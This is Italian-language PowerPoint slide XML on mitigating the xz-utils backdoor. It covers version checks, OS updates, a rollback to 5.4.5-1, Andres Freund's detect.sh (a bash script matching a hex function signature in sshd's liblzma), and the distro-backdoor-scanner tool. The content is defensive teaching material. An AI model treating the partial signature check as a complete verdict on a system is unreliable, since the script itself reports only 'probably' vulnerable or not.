        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="380311643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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0"/>
              <a:t> Forme di mitigazione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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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90</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11853204" cy="390876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800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rimedi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Per prima cosa si può procedere col visualizzare la versione della propria libreria, così da capire se è necessario un aggiornamento. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Per le backdoor sono stati creati software di controllo appositi, come </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>distro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-backdoor-scanner.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inoltre, aggiornare il prima possibile il proprio sistema operativo risulta sicuramente una mossa vincente.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="79140352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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0"/>
              <a:t> Forme di mitigazione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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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91</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11853204" cy="206210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800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Aggiornamenti</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nella maggior parte dei casi, la backdoor non ha raggiunto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>branch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> stabili di Linux, quindi si presume che i più colpiti siano stati </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>gli sviluppatori e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> che nessun sistema di produzione sia stato toccato. In ogni caso, è stato effettuato prima di tutto un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rollback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> alla 5.4.5-1.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, schermata, Carattere, numero&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05BAF8BA-A234-8377-67E1-DD6B062ACC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3114" y="4000898"/>
            <a:ext cx="4562106" cy="2537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55252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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0"/>
              <a:t> Forme di mitigazione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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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92</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11853204" cy="169277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800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz-utils</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Molti siti ed utenti hanno messo a disposizione dei plugin o piccoli script per verificare la versione di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz-utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Anche Andres Freund ha allegato </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>detect.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> alla mail su OSS.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F49120AC-5A72-2642-20CA-7B9C8D9A85AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6319983" y="3921038"/>
            <a:ext cx="10205357" cy="270843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000" dirty="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#! /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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bash</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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set -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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eu</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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 to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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liblzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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 by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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sshd</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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="$(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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ldd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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 $(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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) | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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liblzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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 | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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 -o '/[^ ]*')"</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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does</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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even</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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exist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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?</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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 [ "$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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" == "" ]</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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probably</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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vulnerable</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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    exit</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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# check for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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 signature</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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hexdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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 -ve '1/1 "%.2x"' "$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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" | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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 -q f30f1efa554889f54c89ce5389fb8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>[...]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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then</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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probably</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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vulnerable</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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else</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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probably</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1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vulnerable</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" dirty="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fi</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Immagine 6" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D332432-70EF-2CF9-53BA-518B35BC32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802" y="4238680"/>
            <a:ext cx="6096000" cy="2394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68406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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0"/>
              <a:t> Forme di mitigazione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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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93</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11853204" cy="46474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800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>distro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-backdoor-scanner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Controllo pacchetti sorgente</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>package_unpack_all.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> estrae tutti i package della repository;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. package_scan_all.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ricerca sintomi di una backdoor;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Organizza macro m4 in un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQLite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> database per distinguere quali sono i "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>known</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> good" e quali da controllare.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
